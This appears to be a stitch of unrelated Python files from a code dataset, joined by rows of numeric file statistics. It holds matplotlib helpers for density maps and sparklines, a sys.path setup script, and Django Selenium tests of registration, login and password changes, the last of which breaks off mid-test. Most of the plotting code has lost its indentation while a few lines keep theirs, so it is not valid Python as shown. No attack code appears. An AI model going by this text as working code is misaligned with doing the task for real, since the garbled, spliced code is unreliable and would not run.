color_vals.append(counts[i][j])
x_pos = np.array(x_pos)
y_pos = np.array(y_pos)
color_vals = np.array(color_vals)
if normalized:
vmax = 1.0
vmin = 0.0
if vmin is not None and vmax is None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, vmin=vmin, edgecolors='face')
elif vmax is not None and vmin is None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, vmax=vmax, edgecolors='face')
elif vmin is not None and vmax is not None:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s', s=50, cmap=cma, vmin=vmin, vmax=vmax, edgecolors='face')
else:
plt.scatter(x_pos, y_pos, c=color_vals, marker='s',s=50, cmap=cma, edgecolors='face')
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
if normalized:
cbar.ax.set_ylabel('Count (normalized)')
elif scaled_to_max:
cbar.ax.set_ylabel('Count (scaled to maximum)')
else:
cbar.ax.set_ylabel('Count')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_position_density_map_2d(x_centers, y_centers, counts, save=True, filename='position_density_2d.pdf',
show=False, colorbar=True, vmin=0.0, vmax=None, normalized=False,
scaled_to_max=False, interpolation='none'):
#cma = plt.cm.get_cmap('YlGnBu_r')
cma = plt.cm.get_cmap('jet')
    # rearrange the array for imshow: transpose and flip rows so that
    # counts[i][j] lands at (x_centers[i], y_centers[j]) on the plot
    counts_swapped = np.flipud(counts.T)
if normalized:
vmax = 1.0
vmin = 0.0
if vmin is not None and vmax is None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(counts_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
if normalized:
cbar.ax.set_ylabel('Count (normalized)')
elif scaled_to_max:
cbar.ax.set_ylabel('Count (scaled to maximum)')
else:
cbar.ax.set_ylabel('Count')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
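# Hedged usage sketch: counts from np.histogram2d match the layout assumed
# above, with counts[i][j] belonging to (x_centers[i], y_centers[j]).
def _demo_position_density_map():
    rng = np.random.RandomState(3)
    xy = rng.uniform(0.0, 60.0, size=(5000, 2))
    counts, xe, ye = np.histogram2d(xy[:, 0], xy[:, 1], bins=30)
    xc = 0.5 * (xe[:-1] + xe[1:])            # bin centers from edges
    yc = 0.5 * (ye[:-1] + ye[1:])
    plot_position_density_map_2d(xc, yc, counts,
                                 filename='demo_density2d.pdf')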
def plot_lipid_grid_thickness_map_2d(x_centers, y_centers, thickness_grid, save=True, filename='bilayer_thickness_map_2d.pdf',
show=False, colorbar=True, vmin=0.0, vmax=None, interpolation='none'):
#cma = plt.cm.get_cmap('YlGnBu_r')
cma = plt.cm.get_cmap('viridis')
    # rearrange the array for imshow: transpose and flip rows so that
    # thickness_grid[i][j] lands at (x_centers[i], y_centers[j]) on the plot;
    # the original double loop mishandled non-square grids
    thickness_swapped = np.flipud(thickness_grid.T)
if vmin is not None and vmax is None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(thickness_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
plt.xlabel('x ($\AA$)')
plt.ylabel('y ($\AA$)')
#print in_xyzc[3]
#plt.scatter(in_xyzc[0], in_xyzc[1], c=in_xyzc[3], marker='s',s=50, cmap=cma)
#cax, kw = mpl.colorbar.make_axes(plt.gca())
#norm = mpl.colors.Normalize(vmin = min(in_xyzc[3]), vmax = max(in_xyzc[3]), clip = False)
#c = mpl.colorbar.ColorbarBase(cax, cmap=cma, norm=norm)
if colorbar:
cbar = plt.colorbar()
cbar.ax.set_ylabel('Thickness ($\AA$)')
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_xygrid_as_imshow(x_centers, y_centers, grid, filename='grid.pdf',
save=True, show=False, colorbar=False, colorbarlabel=None,
cmap=None, vmin=None, vmax=None, interpolation='none',
xlabel=None, ylabel=None):
    cma = plt.cm.get_cmap('viridis')
    if cmap is not None:
        cma = cmap  # honor the cmap argument, which was previously ignored
    # rearrange the array for imshow: transpose and flip rows so that
    # grid[i][j] lands at (x_centers[i], y_centers[j]) on the plot;
    # the original double loop mishandled non-square grids
    grid_swapped = np.flipud(grid.T)
if vmin is not None and vmax is None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmin=vmin)
elif vmax is not None and vmin is None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)], vmax=vmax)
elif vmin is not None and vmax is not None:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)],
vmin=vmin, vmax=vmax)
else:
plt.imshow(grid_swapped, cmap=cma, interpolation=interpolation,
extent=[np.min(x_centers), np.max(x_centers), np.min(y_centers), np.max(y_centers)])
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
if colorbar:
cbar = plt.colorbar()
if colorbarlabel is not None:
cbar.ax.set_ylabel(colorbarlabel)
plt.tight_layout()
if save:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
def plot_ebar_hists(center_count_err, name_list=None, filename='ebar_hist.eps',
save=True, show=False, xlabel=None, ylabel='Counts'):
"""Generic plotting function for (multiple) xy datasets.
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00',
'#cc33ff', '#33ccff', '#009999', '#996633',
'#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
i = 0
for cce in center_count_err:
if name_list is not None:
plt.errorbar(cce[0], cce[1], yerr=cce[2], marker=next(_marker),
drawstyle='steps-mid', color=next(_colors),
label=name_list[i])
else:
plt.errorbar(cce[0], cce[1], yerr=cce[2], marker=next(_marker),
drawstyle='steps-mid', color=next(_colors))
i += 1
if xlabel is not None:
plt.xlabel(xlabel)
if ylabel is not None:
plt.ylabel(ylabel)
lgd = None
if name_list is not None:
#lgd = plt.legend(loc=7)
if len(name_list) > 3:
lgd = plt.legend(loc="center left", bbox_to_anchor=(1.04, 0.5))
else:
lgd = plt.legend(loc=0)
plt.tight_layout()
if save:
if lgd is not None:
plt.savefig(filename, bbox_extra_artists=(lgd,), bbox_inches='tight')
else:
plt.savefig(filename)
if show:
return plt.show()
plt.close()
return
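# Hedged usage sketch: plot_ebar_hists takes (bin_centers, counts, errors)
# triples; Poisson (sqrt-N) errors are used here for illustration.
def _demo_plot_ebar_hists():
    rng = np.random.RandomState(4)
    counts, edges = np.histogram(rng.normal(size=2000), bins=20)
    centers = 0.5 * (edges[:-1] + edges[1:])
    plot_ebar_hists([(centers, counts, np.sqrt(counts))],
                    name_list=['toy'], xlabel='Value',
                    filename='demo_ebar_hist.eps')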
def plot_spark(xdat,ydat,filename='plot.eps', save=True, show=False, color='#47d147'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
#plt.plot(xdata, ydata, 'r.')
ax.fill_between(xdat, ydat, min(ydat), alpha=0.1, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
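# Illustrative usage sketch for plot_spark (toy data; not part of the original module).
def _demo_plot_spark():
    xs = list(range(50))
    ys = [x ** 0.5 for x in xs]
    plot_spark(xs, ys, save=False, show=False)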
def plot_spark_multi(xdats,ydats,filename='plot.eps', save=True, show=False, colors=None):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
_colors = itertools.cycle(('#47d147', '#2929a3', '#e6b800', '#e65c00', '#cc33ff', '#33ccff', '#009999', '#996633', '#666699'))
_marker = itertools.cycle(('s', 'o', 'v', 'p', 'D', '^', '8', '>', '<'))
fig, ax = plt.subplots(1, 1)
nsets = len(xdats)
for i in range(nsets):
xdat = xdats[i]
ydat = ydats[i]
try:
color = colors[i]
except (TypeError, IndexError):  # colors is None or shorter than the dataset list
color = next(_colors)
ax.plot(xdat, ydat, color=color, marker=next(_marker), linestyle='-')
ax.fill_between(xdat, ydat, min(ydat), alpha=0.2, color=color)  # fill each curve down to its own minimum
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
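# Illustrative usage sketch for plot_spark_multi (toy data; not part of the original
# module). Passing colors=None exercises the default palette fallback.
def _demo_plot_spark_multi():
    xs = list(range(30))
    ys_a = [0.5 * x for x in xs]
    ys_b = [0.5 * x + 3 for x in xs]
    plot_spark_multi([xs, xs], [ys_a, ys_b], save=False, show=False, colors=None)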
def plot_spark_error(xdat,ydat, error, filename='plot.eps', save=True, show=False, color='#47d147'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
ydat = np.array(ydat)
error = np.array(error)
ax.fill_between(xdat, ydat-error, min(ydat-error), alpha=0.1, color=color)
ax.fill_between(xdat, ydat+error, ydat-error, alpha=0.25, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
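# Illustrative usage sketch for plot_spark_error (toy data; not part of the original module).
def _demo_plot_spark_error():
    xs = np.arange(40)
    ys = np.sin(xs / 5.0)
    err = np.full(ys.shape, 0.1)
    plot_spark_error(xs, ys, err, save=False, show=False)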
def plot_spark_marker(xdat,ydat,filename='plot.eps', save=True, show=False, color='#47d147', marker='s'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color, marker=marker, markersize=40)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
ax.fill_between(xdat, ydat, min(ydat), alpha=0.1, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
def plot_spark_error_marker(xdat,ydat, error, filename='plot.eps',
save=True, show=False, color='#47d147',
marker='s'):
"""Generic plotting function for (multiple) xy datasets.
Based on matplotlib spark_line function defined here:
https://markhneedham.com/blog/2017/09/23/python-3-create-sparklines-using-matplotlib/
Args:
dat_list (list or list like): List of tuples of data vectors in the format [(x_0, y_0), (x_1. y_1), ... ]
yerr_list (list or list like): List of the yerr vectors. e.g. [y_0_err, y_1_err, ... ]
name_list (list or list like, Optional): List of string legend names to assign the curves being plotted.
filename (str, Optional): The string containing the path and filename for the exported plot file.
save (bool, Optional): Set whether to save the generated plot to disc with filename. Default: True
show (bool, Optional): Set whether to show the generated plot in an interactive window (i.e. plt.show()).
Default: False
xlabel (str, Optional): Specify a x-axis label.
ylabel (str, Optional): Specify a y-axis label
marker (str, Optional): Specify a matplotlib marker type for data points.
"""
fig, ax = plt.subplots(1, 1)
ax.plot(xdat, ydat, color=color, marker=marker, markersize=40)
for k,v in ax.spines.items():
v.set_visible(False)
ax.set_xticks([])
ax.set_yticks([])
ydat = np.array(ydat)
error = np.array(error)
ax.fill_between(xdat, ydat-error, min(ydat-error), alpha=0.1, color=color)
ax.fill_between(xdat, ydat+error, ydat-error, alpha=0.25, color=color)
plt.tight_layout()
if save:
plt.savefig(filename, transparent=True, bbox_inches='tight')
if show:
return plt.show()
plt.close()
return
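# Illustrative usage sketch for the marker variants (toy data; not part of the
# original module). Note that markersize=40 is intentionally oversized in these helpers.
def _demo_plot_spark_error_marker():
    xs = np.arange(10)
    ys = xs ** 2
    err = np.sqrt(ys + 1)
    plot_spark_error_marker(xs, ys, err, save=False, show=False, marker='o')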
| 39.761329 | 157 | 0.563696 | 9,196 | 65,805 | 3.906046 | 0.065355 | 0.015813 | 0.016787 | 0.011693 | 0.810496 | 0.789143 | 0.764143 | 0.750028 | 0.734994 | 0.717121 | 0 | 0.026165 | 0.312347 | 65,805 | 1,654 | 158 | 39.785369 | 0.767629 | 0.282623 | 0 | 0.728122 | 1 | 0 | 0.050143 | 0.004776 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028037 | false | 0 | 0.009346 | 0 | 0.08921 | 0.002549 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3e4908d88580e139c3ff59a4cc61348df289caf1 | 273 | py | Python | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | python/test/path_append.py | gangserver/py_test | 869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4 | [
"Apache-2.0"
] | null | null | null | import sys
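# Extend the module search path so sibling project directories under the dev tree can be imported.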
sys.path.append("/home/gangserver/dev/data")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/test")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/exam")
sys.path.append("/home/gangserver/dev/git/pydev/net/dasom/python/doit")
| 39 | 71 | 0.772894 | 45 | 273 | 4.688889 | 0.355556 | 0.132701 | 0.246446 | 0.322275 | 0.881517 | 0.881517 | 0.739336 | 0.739336 | 0.739336 | 0.739336 | 0 | 0 | 0.025641 | 273 | 6 | 72 | 45.5 | 0.793233 | 0 | 0 | 0 | 0 | 0 | 0.663004 | 0.663004 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
e415a6780e4c5916c0343e4a534b33c87c27d049 | 14,896 | py | Python | mutadi/members/tests/test_chrome.py | etiennody/mutadi | 23b15c0fc19e183f4e5602488748e912e6077cb2 | [
"MIT"
] | 1 | 2021-02-03T18:48:50.000Z | 2021-02-03T18:48:50.000Z | mutadi/members/tests/test_chrome.py | achrafbouzekri/mutadi | 14c0cd6a55423c6710b5b595f7d0d442f78f7765 | [
"MIT"
] | 7 | 2021-06-01T14:34:13.000Z | 2022-03-12T00:58:31.000Z | mutadi/members/tests/test_chrome.py | achrafbouzekri/mutadi | 14c0cd6a55423c6710b5b595f7d0d442f78f7765 | [
"MIT"
] | 1 | 2021-02-03T18:48:38.000Z | 2021-02-03T18:48:38.000Z | """Functional tests for members app"""
import time
import urllib.parse
import pytest
from django.contrib.auth import get_user_model
from django.test import LiveServerTestCase
from model_bakery import baker
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
pytestmark = pytest.mark.django_db
User = get_user_model()
class TestRegisterSelenium(LiveServerTestCase):
"""Selenium functional tests for user registration."""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_register_page(self):
"""Register page should redirect to login page after sign up validation."""
url = urllib.parse.urljoin(self.live_server_url, "/members/register/")
self.driver.get(url)
username = self.driver.find_element(By.ID, "id_username")
first_name = self.driver.find_element(By.ID, "id_first_name")
last_name = self.driver.find_element(By.ID, "id_last_name")
email = self.driver.find_element(By.ID, "id_email")
password1 = self.driver.find_element(By.ID, "id_password1")
password2 = self.driver.find_element(By.ID, "id_password2")
submit = self.driver.find_element(By.CLASS_NAME, "btn")
time.sleep(5)
self.driver.implicitly_wait(5)
username.send_keys("BobRobert")
first_name.send_keys("Bob")
last_name.send_keys("Robert")
email.send_keys("bobrobert@test.com")
password1.send_keys("fglZfYmr%?,9")
password2.send_keys("fglZfYmr%?,9")
submit.click()
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (self.live_server_url, "/members/login")
assert "Se connecter" in self.driver.page_source
assert self.driver.page_source
class TestLoginSelenium(LiveServerTestCase):
"""Selenium functional tests for user login."""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
self.proto_user = baker.make(User)
self.proto_user.set_password("m=9UaK^C,Tbq9N=T")
self.proto_user.save()
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_login_page(self):
"""Login page shoud redirect to home page after sign in validation."""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s" % (self.live_server_url)
assert "Accueil :: Mutadi" in self.driver.title
class TestChangePasswordSelenium(LiveServerTestCase):
"""Selenium functional tests for user chenge password process"""
serialized_rollback = True
def setUp(self):
super().setUp()
options = Options()
options.add_argument("--headless")
options.add_argument("--disable-gpu")
options.add_argument("--remote-debugging-port=9222")
options.add_argument("--window-size=1920x1080")
self.driver = webdriver.Chrome(options=options)
self.proto_user = baker.make(User)
self.proto_user.set_password("m=9UaK^C,Tbq9N=T")
self.proto_user.save()
def tearDown(self):
self.driver.close()
super().tearDown()
def test_valid_live_change_password_page(self):
"""Validate data entries on the change password page"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("%h2KtHFJ_%JY")
new_password2.send_keys("%h2KtHFJ_%JY")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/change_password_success",
)
assert "Mot de passe modifié :: Mutadi" in self.driver.title
assert (
"Votre mot de passe a été modifié avec succès !"
in self.driver.page_source
)
def test_invalid_live_change_password_with_personal_information(self):
"""Unvalidate data entries on the change password page with personal information"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys(self.proto_user.username)
new_password2.send_keys(self.proto_user.username)
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Le mot de passe est trop semblable "
"au champ « nom d’utilisateur »."
) in self.driver.page_source
def test_invalid_live_change_password_with_only_number(self):
"""Unvalidate data entries on the change password page with only number"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("12345678")
new_password2.send_keys("12345678")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Ce mot de passe est entièrement numérique."
in self.driver.page_source
)
def test_invalid_live_change_password_with_short_entries(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
new_password1 = self.driver.find_element(By.ID, "id_new_password1")
new_password2 = self.driver.find_element(By.ID, "id_new_password2")
submit = self.driver.find_element(By.ID, "submit-button")
old_password.send_keys("m=9UaK^C,Tbq9N=T")
new_password1.send_keys("Q=3")
new_password2.send_keys("Q=3")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
current_url = self.driver.current_url
if (self.driver.current_url[len(self.driver.current_url) - 1]) == "/":
current_url = self.driver.current_url[:-1]
assert current_url == "%s%s" % (
self.live_server_url,
"/members/password",
)
assert (
"Ce mot de passe est trop court. "
"Il doit contenir au minimum 8 caractères."
) in self.driver.page_source
def test_invalid_live_change_password_with_differents_new_passwords(self):
"""Unvalidate data entries on the change password page with short entries"""
self.driver.get("%s%s" % (self.live_server_url, "/members/login/"))
username = self.driver.find_element(By.ID, "id_username")
password = self.driver.find_element(By.ID, "id_password")
submit = self.driver.find_element(By.ID, "submit-button")
username.send_keys(self.proto_user.username)
password.send_keys("m=9UaK^C,Tbq9N=T")
submit.send_keys(Keys.RETURN)
time.sleep(5)
self.driver.implicitly_wait(5)
self.driver.get("%s%s" % (self.live_server_url, "/members/password/"))
old_password = self.driver.find_element(By.ID, "id_old_password")
